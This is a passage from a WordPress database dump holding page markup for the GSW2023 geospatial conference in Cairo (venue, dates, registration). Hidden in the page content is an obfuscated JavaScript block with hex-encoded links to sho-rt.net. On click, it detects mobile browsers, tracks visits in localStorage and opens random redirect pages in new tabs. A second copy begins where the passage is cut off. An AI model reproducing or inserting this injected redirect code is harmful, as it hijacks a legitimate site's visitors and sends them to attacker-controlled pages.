width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:53:43','2022-11-09 20:53:43','',3066,'https://gsw2023.com/?p=3224',0,'revision','',0),
(3225,1,'2022-11-09 20:57:02','2022-11-09 20:57:02','','aast','','inherit','open','closed','','aast-2','','','2022-11-09 20:57:02','2022-11-09 20:57:02','',3066,'https://gsw2023.com/wp-content/uploads/2022/11/aast.jpg',0,'attachment','image/jpeg',0);
INSERT INTO `dnctiavkr_posts` VALUES
(3226,1,'2022-11-09 20:57:48','2022-11-09 20:57:48','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3220\" img_size=\"500x375\" alignment=\"center\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 